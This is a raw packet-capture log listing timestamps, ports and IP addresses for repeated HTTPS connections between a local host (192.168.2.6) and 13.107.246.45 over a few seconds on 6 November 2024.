Nov 6, 2024 17:03:14.368596077 CET	443	50136	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.368606091 CET	50136	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.368612051 CET	443	50136	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.370054007 CET	443	50131	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.371340036 CET	50138	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.371362925 CET	443	50138	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.371440887 CET	50138	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.371440887 CET	50139	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.371474981 CET	443	50139	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.371526957 CET	50139	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.371711016 CET	50131	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.371733904 CET	443	50131	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.372111082 CET	50131	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.372119904 CET	443	50131	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.372246027 CET	50138	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.372256041 CET	443	50138	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.372332096 CET	50139	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.372354031 CET	443	50139	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.499125004 CET	443	50131	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.499658108 CET	443	50131	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.499798059 CET	50131	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.499847889 CET	50131	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.499847889 CET	50131	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.499867916 CET	443	50131	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.499878883 CET	443	50131	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.502468109 CET	50140	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.502530098 CET	443	50140	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.502613068 CET	50140	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.502748966 CET	50140	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.502762079 CET	443	50140	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.749958992 CET	443	50137	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.750638008 CET	50137	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.750672102 CET	443	50137	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.751441956 CET	50137	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.751447916 CET	443	50137	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.886665106 CET	443	50137	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.886748075 CET	443	50137	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.886800051 CET	50137	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.887026072 CET	50137	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.887048960 CET	443	50137	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.887059927 CET	50137	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.887064934 CET	443	50137	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.890301943 CET	50141	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.890352964 CET	443	50141	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:14.890430927 CET	50141	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.890573025 CET	50141	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:14.890588045 CET	443	50141	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.116486073 CET	443	50139	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.117136002 CET	50139	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.117168903 CET	443	50139	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.117599964 CET	50139	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.117604017 CET	443	50139	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.137588978 CET	443	50138	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.138077974 CET	50138	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.138111115 CET	443	50138	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.138465881 CET	50138	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.138472080 CET	443	50138	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.243944883 CET	443	50140	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.244553089 CET	50140	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.244592905 CET	443	50140	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.244999886 CET	50140	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.245007038 CET	443	50140	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.246799946 CET	443	50139	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.247431993 CET	443	50139	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.247479916 CET	443	50139	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.247495890 CET	50139	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.247539997 CET	50139	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.247596979 CET	50139	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.247617960 CET	443	50139	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.247627974 CET	50139	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.247633934 CET	443	50139	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.250334978 CET	50142	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.250375032 CET	443	50142	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.250519991 CET	50142	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.250767946 CET	50142	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.250782967 CET	443	50142	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.274204016 CET	443	50138	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.274307013 CET	443	50138	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.274378061 CET	50138	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.274565935 CET	50138	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.274590015 CET	443	50138	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.274604082 CET	50138	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.274610996 CET	443	50138	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.277542114 CET	50143	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.277590036 CET	443	50143	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.277713060 CET	50143	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.277884007 CET	50143	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.277904987 CET	443	50143	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.373047113 CET	443	50140	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.373097897 CET	443	50140	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.373167992 CET	443	50140	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.373246908 CET	50140	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.373296022 CET	50140	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.373594046 CET	50140	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.373620033 CET	443	50140	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.373632908 CET	50140	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.373639107 CET	443	50140	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.377048016 CET	50144	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.377099991 CET	443	50144	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.377207041 CET	50144	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.377443075 CET	50144	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.377455950 CET	443	50144	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.620132923 CET	443	50141	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.620764971 CET	50141	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.620800018 CET	443	50141	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.621237040 CET	50141	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.621243954 CET	443	50141	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.750782013 CET	443	50141	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.750950098 CET	443	50141	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.751019955 CET	50141	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.751194000 CET	50141	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.751214027 CET	443	50141	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.751226902 CET	50141	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.751234055 CET	443	50141	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.754210949 CET	50145	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.754249096 CET	443	50145	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.754318953 CET	50145	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.754535913 CET	50145	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.754547119 CET	443	50145	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.981139898 CET	443	50142	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.981981993 CET	50142	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.982017994 CET	443	50142	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:15.982476950 CET	50142	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:15.982487917 CET	443	50142	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.007447958 CET	443	50143	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.008104086 CET	50143	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.008136988 CET	443	50143	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.008537054 CET	50143	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.008543015 CET	443	50143	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.113559961 CET	443	50142	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.113631964 CET	443	50142	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.113699913 CET	50142	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.113959074 CET	50142	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.113981962 CET	443	50142	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.113995075 CET	50142	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.114001989 CET	443	50142	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.117060900 CET	50146	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.117110968 CET	443	50146	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.117177010 CET	50146	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.117341995 CET	50146	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.117357969 CET	443	50146	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.138951063 CET	443	50144	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.141637087 CET	50144	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.141671896 CET	443	50144	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.142512083 CET	50144	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.142527103 CET	443	50144	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.145418882 CET	443	50143	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.148062944 CET	443	50143	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.148161888 CET	50143	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.148210049 CET	50143	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.148230076 CET	443	50143	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.148245096 CET	50143	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.148251057 CET	443	50143	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.151164055 CET	50147	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.151202917 CET	443	50147	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.151320934 CET	50147	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.151421070 CET	50147	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.151429892 CET	443	50147	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.277820110 CET	443	50144	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.277858973 CET	443	50144	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.277920008 CET	443	50144	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.277960062 CET	50144	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.277997017 CET	50144	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.278247118 CET	50144	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.278275967 CET	443	50144	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.278286934 CET	50144	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.278291941 CET	443	50144	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.281255960 CET	50148	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.281311035 CET	443	50148	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.281433105 CET	50148	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.281601906 CET	50148	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.281620979 CET	443	50148	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.507095098 CET	443	50145	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.507667065 CET	50145	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.507705927 CET	443	50145	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.508136034 CET	50145	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.508141041 CET	443	50145	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.636259079 CET	443	50145	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.636338949 CET	443	50145	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.636409044 CET	50145	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.636624098 CET	50145	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.636646032 CET	443	50145	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.636658907 CET	50145	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.636665106 CET	443	50145	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.640497923 CET	50149	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.640537024 CET	443	50149	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.640611887 CET	50149	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.640763998 CET	50149	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.640774012 CET	443	50149	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.859147072 CET	443	50146	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.859884977 CET	50146	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.859919071 CET	443	50146	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.860222101 CET	50146	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.860228062 CET	443	50146	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.889790058 CET	443	50147	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.890320063 CET	50147	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.890363932 CET	443	50147	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.891002893 CET	50147	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.891017914 CET	443	50147	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.989572048 CET	443	50146	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.989698887 CET	443	50146	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.989742994 CET	443	50146	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.989909887 CET	50146	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.989909887 CET	50146	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.990335941 CET	50146	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.990360022 CET	443	50146	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.990375996 CET	50146	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.990381956 CET	443	50146	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.993526936 CET	50150	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.993570089 CET	443	50150	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:16.993680000 CET	50150	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.993885994 CET	50150	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:16.993901968 CET	443	50150	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.003843069 CET	443	50148	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.004338026 CET	50148	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.004357100 CET	443	50148	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.004848957 CET	50148	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.004854918 CET	443	50148	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.108376980 CET	443	50147	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.108453035 CET	443	50147	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.108664989 CET	50147	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.108752966 CET	50147	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.108773947 CET	443	50147	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.108792067 CET	50147	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.108798027 CET	443	50147	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.111716986 CET	50151	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.111756086 CET	443	50151	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.111838102 CET	50151	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.112013102 CET	50151	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.112029076 CET	443	50151	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.144033909 CET	443	50148	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.144136906 CET	443	50148	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.144325972 CET	50148	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.144397020 CET	50148	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.144412041 CET	443	50148	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.144426107 CET	50148	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.144431114 CET	443	50148	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.159991980 CET	50152	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.160020113 CET	443	50152	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.160083055 CET	50152	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.160259962 CET	50152	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.160275936 CET	443	50152	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.386703968 CET	443	50149	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.387212038 CET	50149	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.387218952 CET	443	50149	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.387805939 CET	50149	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.387809038 CET	443	50149	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.519686937 CET	443	50149	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.519901037 CET	443	50149	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.519961119 CET	50149	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.520013094 CET	50149	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.520025969 CET	443	50149	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.520037889 CET	50149	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.520044088 CET	443	50149	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.522902966 CET	50153	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.522947073 CET	443	50153	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.523046970 CET	50153	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.523298025 CET	50153	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.523319960 CET	443	50153	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.737898111 CET	443	50150	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.738342047 CET	50150	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.738379955 CET	443	50150	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.738792896 CET	50150	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.738801956 CET	443	50150	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.873424053 CET	443	50150	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.873496056 CET	443	50150	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.873559952 CET	50150	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.873733044 CET	50150	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.873758078 CET	443	50150	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.873769999 CET	50150	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.873775959 CET	443	50150	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.876271963 CET	50154	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.876315117 CET	443	50154	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.876393080 CET	50154	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.876534939 CET	50154	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.876548052 CET	443	50154	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.887459993 CET	443	50152	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.887933016 CET	50152	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.887960911 CET	443	50152	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:17.888412952 CET	50152	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:17.888425112 CET	443	50152	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.018146038 CET	443	50152	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.018232107 CET	443	50152	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.018295050 CET	50152	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.018560886 CET	50152	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.018582106 CET	443	50152	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.018594027 CET	50152	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.018599987 CET	443	50152	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.021662951 CET	50155	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.021708012 CET	443	50155	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.021837950 CET	50155	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.022011042 CET	50155	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.022025108 CET	443	50155	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.276369095 CET	443	50153	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.276932001 CET	50153	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.276961088 CET	443	50153	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.277496099 CET	50153	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.277503014 CET	443	50153	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.681255102 CET	443	50153	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.681334019 CET	443	50153	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.681397915 CET	50153	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.681592941 CET	50153	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.681613922 CET	443	50153	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.681624889 CET	50153	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.681631088 CET	443	50153	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.684753895 CET	50156	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.684803009 CET	443	50156	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.684901953 CET	50156	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.685074091 CET	50156	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.685087919 CET	443	50156	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.808799028 CET	443	50154	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.809423923 CET	50154	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.809462070 CET	443	50154	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.809875965 CET	50154	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.809881926 CET	443	50154	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.810734034 CET	443	50155	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.810997963 CET	50155	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.811028004 CET	443	50155	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.811336994 CET	50155	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.811343908 CET	443	50155	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.939033985 CET	443	50154	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.939090967 CET	443	50154	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.939145088 CET	443	50154	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.939155102 CET	50154	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.939192057 CET	50154	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.939436913 CET	50154	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.939457893 CET	443	50154	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.939469099 CET	50154	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.939475060 CET	443	50154	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.942459106 CET	50157	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.942501068 CET	443	50157	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.942583084 CET	50157	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.942847013 CET	50157	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.942857981 CET	443	50157	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.947803020 CET	443	50155	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.947870970 CET	443	50155	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.947922945 CET	50155	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.948020935 CET	50155	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.948044062 CET	443	50155	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.948059082 CET	50155	443	192.168.2.6	13.107.246.45
